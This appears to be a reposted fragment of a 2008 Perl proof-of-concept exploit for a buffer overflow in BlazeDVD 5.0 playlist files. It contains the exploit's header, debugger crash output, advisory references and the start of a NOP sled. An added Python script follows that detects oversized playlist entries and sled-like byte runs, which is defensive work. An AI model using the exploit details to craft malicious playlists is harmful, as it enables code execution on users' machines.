
BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit

Source: 易采站长站
#!/usr/bin/perl
#
# Title: BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit (PoC)
#
# Summary: BlazeDVD is a leading, powerful and easy-to-use DVD player software.
# It can provide superior video and audio (Dolby) quality, together with other
# enhanced features, e.g. recording DVD, playback image and DV, bookmark and image
# capture, etc. Furthermore, besides DVD, Video CD, Audio CD, BlazeDVD supports DIVX,
# MPEG4, RM, QuickTime, WMV, WMV-HD, MacroMedia Flash and any other video file
# you have the codec installed for. The DVD player software can be extensively
# compatible with hardware, which is operated stably and smoothly under Windows 98,
# 98SE, Me, 2000, XP, VISTA.
#
# Product web Page: http://www.blazevideo.com/dvd-player/index.htm
#
# Desc: BlazeDVD 5.0 suffers from a buffer overflow vulnerability that can be
# exploited via a crafted PLF playlist file locally and remotely. It fails to
# perform boundary checking of the user input file, allowing the EIP to be
# overwritten, thus controlling the next instruction of the software. After
# successful exploitation, calc.exe will be executed. Failed attempts will
# result in Denial of Service (DoS).
#
# WinDbg (output):
#
# - (4d8.f80): Access violation - code c0000005 (first chance)
# - First chance exceptions are reported before any exception handling.
# - This exception may be expected and handled.
# - eax=00000001 ebx=77f6c15c ecx=04bd0ba8 edx=00000042 esi=01beffc0 edi=6405565c
# - eip=41414141 esp=0012f188 ebp=01befcf8 iopl=0 nv up ei pl nz ac pe nc
# - cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010216
# - 41414141 ?? ???
#
#
# Tested on Microsoft Windows XP SP2 (English)
#
# Vulnerability discovered by: Parvez Anwar and Greg Linares
#
# Refs:
#
# - http://secunia.com/advisories/23041/
# - http://www.frsirt.com/english/advisories/2006/4764
# - http://xforce.iss.net/xforce/xfdb/30567
# - http://osvdb.org/30770
# - http://www.securityfocus.com/bid/21337/
# - http://www.milw0rm.com/exploits/2880
#
# Exploit coded by Gjoko 'LiquidWorm' Krstic
#
# liquidworm@gmail.com
#
# http://www.zeroscience.org
#
# 08.08.2008
#

print "\n|==================================================================|\n";
print "| |\n";
print "| BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit |\n";
print "| by LiquidWorm <liquidworm [at] gmail.com> |\n";
print "| |\n";
print "|==================================================================|\n\n";

$nop = "\x90" x 96;
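
The header above attributes the overflow to missing bounds checking on the playlist input, and the debugger output shows EIP filled with 0x41 bytes. The Python triage script below is an added example, not part of the original exploit or of BlazeDVD: it flags PLF files carrying those traits before they reach a player. The newline-separated entry layout, the 260-byte entry limit, the 16-byte run threshold and the sample data are assumptions made for illustration.

```python
import re
import sys

MAX_ENTRY_LEN = 260  # assumption: Windows MAX_PATH as ceiling for a legitimate entry
MIN_RUN = 16         # assumption: shortest repeated-byte run treated as suspicious

# One byte followed by at least MIN_RUN - 1 copies of itself.
_RUN = re.compile(rb"(.)\1{%d,}" % (MIN_RUN - 1), re.DOTALL)


def scan_plf(data):
    """Return a list of (line_number, reason) findings for raw playlist bytes."""
    findings = []
    for lineno, entry in enumerate(data.splitlines(), start=1):
        # Over-long entries are what an unchecked fixed-size buffer cannot hold.
        if len(entry) > MAX_ENTRY_LEN:
            findings.append(
                (lineno, f"entry is {len(entry)} bytes, limit {MAX_ENTRY_LEN}"))
        # Filler such as 0x41 padding or a 0x90 sled shows up as long runs.
        for match in _RUN.finditer(entry):
            byte = match.group(1)[0]
            kind = "NOP-sled run" if byte == 0x90 else "repeated-byte run"
            findings.append(
                (lineno, f"{kind}: 0x{byte:02x} x {len(match.group(0))}"))
    return findings


# Constructed sample: one ordinary entry, then an oversized entry made only of
# padding and NOP bytes (no payload), mirroring the traits named on this page.
SAMPLE = (b"C:\\Videos\\holiday.avi\r\n"
          + b"A" * 300 + b"\x90" * 96 + b"\r\n")

if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as handle:
            content = handle.read()
    else:
        content = SAMPLE
    results = scan_plf(content)
    for lineno, reason in results:
        print(f"line {lineno}: {reason}")
    sys.exit(1 if results else 0)
```

Run it with a file path to scan a playlist, or with no arguments to scan the constructed sample; a non-zero exit status means at least one finding.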